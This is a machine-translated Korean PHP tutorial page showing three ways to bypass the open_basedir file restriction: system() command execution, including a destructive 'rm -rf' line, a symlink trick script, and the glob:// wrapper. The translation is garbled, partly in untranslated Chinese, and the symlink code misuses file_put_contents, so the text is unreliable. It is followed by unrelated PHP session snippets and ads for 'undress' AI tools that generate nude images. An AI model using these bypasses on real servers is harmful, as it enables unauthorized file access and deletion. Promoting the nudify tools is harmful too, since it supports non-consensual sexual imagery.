이 기사에서는 PHP가 파일 운영에 대한 open_basedir 제한을 우회하는 세 가지 방법과 관련 기술을 공유합니다. 관심 있는 친구는 여기서 배울 수 있습니다.
0x00 사전 지식
open_basedir에 대하여
open_basedir은 php.ini의 구성 옵션입니다
파일에 대한 사용자 액세스 범위를 지정된 영역으로 제한할 수 있습니다.
open_basedir=/home/wwwroot /를 가정합니다. home/web1/:/tmp/이면 web1을 통해 서버에 액세스하는 사용자는 /home/wwwroot/home/web1/ 및 /tmp/ 두 디렉터리를 제외하고 서버에서 파일을 얻을 수 없습니다.
open_basedir로 지정된 제한은 실제로 디렉터리 이름이 아니라 접두사입니다.
예: "open_basedir = /dir/user"인 경우 "/dir/user" 및 "/dir/user1" 디렉터리에 액세스할 수 있습니다. 따라서 지정된 디렉토리에만 액세스를 제한하려면 경로 이름을 슬래시로 끝내십시오.
심볼릭 링크 정보
소프트 링크라고도 하는 심볼릭 링크는 다른 파일의 경로 이름(절대 경로 또는 상대 경로)을 포함하는 특수한 유형의 파일입니다.
경로는 어떤 파일이나 디렉터리도 될 수 있으며, 다른 파일 시스템의 파일을 연결할 수도 있습니다. 심볼 파일을 읽거나 쓸 때 시스템은 해당 작업을 소스 파일에 대한 작업으로 자동 변환합니다. 그러나 링크된 파일을 삭제하면 시스템은 링크된 파일만 삭제하고 소스 파일 자체는 삭제하지 않습니다.
0x01 명령 실행 기능
시스템 등의 명령 실행 기능에서는 open_basedir의 설정이 유효하지 않기 때문에 명령 실행 기능을 이용하여 제한된 디렉터리에 접근할 수 있습니다.
먼저
/home/puret/test/
디렉터리를 만들고 이 디렉터리에 abc
nano 1.txt
콘텐츠로 새 1.txt를 만든 다음 새 디렉터리를 만듭니다. 이 디렉토리에서 디렉토리 이름은 b
mkdir b
이고 이 디렉토리에
<?php echo file_get_contents("../1.txt"); ?>
내용으로 1.php 파일을 생성하고 php.ini
open_basedir에 open_basedir을 설정합니다. /home /puret/test/b/
open_basedir이 액세스를 제한하는지 확인하기 위해 1.php를 실행하려고 합니다
실행 효과는 그림과 같습니다
분명히 디렉토리를 직접 읽을 수는 없습니다. open_basedir 문서에 지정된 것 이외의 것.
다음으로 시스템 기능을 사용하여 open_basedir의 제한 사항을 우회하여 1.txt
1.php를
<?php system("rm -rf ../1.txt"); ?>
로 편집합니다. 먼저 실행 전 파일 상황을 살펴보겠습니다. 1.php
1.php
실행 후 open_basedir를 우회하여 명령 실행 기능을 통해 파일을 삭제하는데 성공했습니다.
명령 실행 기능은 일반적으로 비활성화_기능으로 제한되므로 제한을 우회할 수 있는 다른 방법을 찾아야 합니다.
0x02 심볼릭 링크() 함수
먼저 심볼릭 링크 함수를 이해해 봅시다
bool 심볼릭 링크( string $target , string $link )
심볼릭 링크 함수는 대상을 가리키는 link라는 심볼릭 링크를 설정합니다. 물론 일반적인 상황에서는 이 대상이 open_basedir로 제한됩니다.
초기 심볼릭링크는 윈도우를 지원하지 않아서 테스트 환경을 리눅스에 두었습니다.
테스트한 PHP 버전은 5.3.0입니다. 다른 버전도 직접 테스트해 보세요.
Linux 환경에서는 디렉토리 전반에 걸쳐 파일을 작동할 수 있는 심볼릭 링크를 통해 일부 논리적 우회를 완료할 수 있습니다.
먼저 /var/www/html/1.php의 1.php 내용을
<?php mkdir("c"); chdir("c"); mkdir("d"); chdir("d"); chdir(".."); chdir(".."); symlink("c/d","tmplink"); symlink("tmplink/../../1.txt","exploit"); unlink("tmplink"); mkdir("tmplink"); echo file_put_contents("http://127.0.0.1/exploit"); ?>
로 편집한 다음 /var/www/에
내용으로 새 1.txt 파일을 만듭니다."abc"
open_basedir을 설정합시다
open_basedir = /var/www/html/
html 디렉토리에 있는 PHP 스크립트를 편집하여 open_basedir
<?php file_get_contents("../1.txt"); ?>
실행해 보세요.
예상대로 파일에 접근할 수 없습니다.
방금 작성한 스크립트 1.php를 실행합니다
open_basedir
문제의 핵심은 1.txt의 파일 내용이 성공적으로 읽혀진 것을 볼 수 있습니다.
symlink ("tmplink/../../1.txt","exploit");
현재 tmplink는 여전히 심볼릭 링크 파일이고, 가리키는 경로는 c/d이고, 따라서 Exploit이 가리키는 경로는
c/d/../../1.txt
이 경로가 open_basedir 범위 내에 있으므로 Exploit이 성공적으로 수행된 것입니다.
이후 tmplink 심볼릭 링크 파일을 삭제하고 tmplink와 동일한 이름의 새 폴더를 생성합니다. 이때 익스플로잇이 가리키는 경로는
입니다.tmplink/../../
由于这时候tmplink变成了一个真实存在的文件夹所以tmplink/../../变成了1.txt所在的目录即/var/www/
然后再通过访问符号链接文件exploit即可直接读取到1.txt的文件内容
当然,针对symlink()只需要将它放入disable_function即可解决问题,所以我们需要寻求更多的方法。
0x03 glob伪协议
glob是php自5.3.0版本起开始生效的一个用来筛选目录的伪协议,由于它在筛选目录时是不受open_basedir的制约的,所以我们可以利用它来绕过限制,我们新建一个目录在/var/www/下命名为test
并且在/var/www/html/下新建t.php内容为
<?php $a = "glob:///var/www/test/*.txt"; if ( $b = opendir($a) ) { while ( ($file = readdir($b)) !== false ) { echo "filename:".$file."\n"; } closedir($b); } ?>
执行结果如图:
成功躲过open_basedir的限制读取到了文件。
以上就是本文的全部内容,希望对大家的学习有所帮助,更多相关内容请关注PHP中文网!
相关推荐:
关于ThinkPHP中Common/common.php文件常用函数的功能分析
PHP的Cannot use object of type stdClass as array in错误的解决办法
위 내용은 PHP를 통해 파일 운영에 대한 open_basedir 제한을 우회하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

데이터베이스 스토리지 세션 사용의 주요 장점에는 지속성, 확장 성 및 보안이 포함됩니다. 1. 지속성 : 서버가 다시 시작 되더라도 세션 데이터는 변경되지 않아도됩니다. 2. 확장 성 : 분산 시스템에 적용하여 세션 데이터가 여러 서버간에 동기화되도록합니다. 3. 보안 : 데이터베이스는 민감한 정보를 보호하기 위해 암호화 된 스토리지를 제공합니다.

SessionHandlerInterface 인터페이스를 구현하여 PHP에서 사용자 정의 세션 처리 구현을 수행 할 수 있습니다. 특정 단계에는 다음이 포함됩니다. 1) CustomsessionHandler와 같은 SessionHandlerInterface를 구현하는 클래스 만들기; 2) 인터페이스의 방법 (예 : Open, Close, Read, Write, Despare, GC)의 수명주기 및 세션 데이터의 저장 방법을 정의하기 위해 방법을 다시 작성합니다. 3) PHP 스크립트에 사용자 정의 세션 프로세서를 등록하고 세션을 시작하십시오. 이를 통해 MySQL 및 Redis와 같은 미디어에 데이터를 저장하여 성능, 보안 및 확장 성을 향상시킬 수 있습니다.

SessionId는 웹 애플리케이션에 사용되는 메커니즘으로 사용자 세션 상태를 추적합니다. 1. 사용자와 서버 간의 여러 상호 작용 중에 사용자의 신원 정보를 유지하는 데 사용되는 무작위로 생성 된 문자열입니다. 2. 서버는 쿠키 또는 URL 매개 변수를 통해 클라이언트로 생성하여 보낸다. 3. 생성은 일반적으로 임의의 알고리즘을 사용하여 독창성과 예측 불가능 성을 보장합니다. 4. 실제 개발에서 Redis와 같은 메모리 내 데이터베이스를 사용하여 세션 데이터를 저장하여 성능 및 보안을 향상시킬 수 있습니다.

JWT 또는 쿠키를 사용하여 API와 같은 무국적 환경에서 세션을 관리 할 수 있습니다. 1. JWT는 무국적자 및 확장 성에 적합하지만 빅 데이터와 관련하여 크기가 크다. 2. 쿠키는보다 전통적이고 구현하기 쉽지만 보안을 보장하기 위해주의해서 구성해야합니다.

세션 관련 XSS 공격으로부터 응용 프로그램을 보호하려면 다음 조치가 필요합니다. 1. 세션 쿠키를 보호하기 위해 Httponly 및 Secure 플래그를 설정하십시오. 2. 모든 사용자 입력에 대한 내보내기 코드. 3. 스크립트 소스를 제한하기 위해 컨텐츠 보안 정책 (CSP)을 구현하십시오. 이러한 정책을 통해 세션 관련 XSS 공격을 효과적으로 보호 할 수 있으며 사용자 데이터가 보장 될 수 있습니다.

PHP 세션 성능을 최적화하는 방법 : 1. 지연 세션 시작, 2. 데이터베이스를 사용하여 세션을 저장, 3. 세션 데이터 압축, 4. 세션 수명주기 관리 및 5. 세션 공유 구현. 이러한 전략은 높은 동시성 환경에서 응용의 효율성을 크게 향상시킬 수 있습니다.

THESESSION.GC_MAXLIFETIMESETTINGINSTTINGTINGSTINGTERMINESTERMINESTERSTINGSESSIONDATA, SETINSECONDS.1) IT'SCONFIGUDEDINPHP.INIORVIAINI_SET ()

PHP에서는 Session_Name () 함수를 사용하여 세션 이름을 구성 할 수 있습니다. 특정 단계는 다음과 같습니다. 1. Session_Name () 함수를 사용하여 Session_Name ( "my_session")과 같은 세션 이름을 설정하십시오. 2. 세션 이름을 설정 한 후 세션을 시작하여 세션을 시작하십시오. 세션 이름을 구성하면 여러 응용 프로그램 간의 세션 데이터 충돌을 피하고 보안을 향상시킬 수 있지만 세션 이름의 독창성, 보안, 길이 및 설정 타이밍에주의를 기울일 수 있습니다.


핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

Video Face Swap
완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

인기 기사

뜨거운 도구

VSCode Windows 64비트 다운로드
Microsoft에서 출시한 강력한 무료 IDE 편집기

ZendStudio 13.5.1 맥
강력한 PHP 통합 개발 환경

맨티스BT
Mantis는 제품 결함 추적을 돕기 위해 설계된 배포하기 쉬운 웹 기반 결함 추적 도구입니다. PHP, MySQL 및 웹 서버가 필요합니다. 데모 및 호스팅 서비스를 확인해 보세요.

메모장++7.3.1
사용하기 쉬운 무료 코드 편집기

mPDF
mPDF는 UTF-8로 인코딩된 HTML에서 PDF 파일을 생성할 수 있는 PHP 라이브러리입니다. 원저자인 Ian Back은 자신의 웹 사이트에서 "즉시" PDF 파일을 출력하고 다양한 언어를 처리하기 위해 mPDF를 작성했습니다. HTML2FPDF와 같은 원본 스크립트보다 유니코드 글꼴을 사용할 때 속도가 느리고 더 큰 파일을 생성하지만 CSS 스타일 등을 지원하고 많은 개선 사항이 있습니다. RTL(아랍어, 히브리어), CJK(중국어, 일본어, 한국어)를 포함한 거의 모든 언어를 지원합니다. 중첩된 블록 수준 요소(예: P, DIV)를 지원합니다.
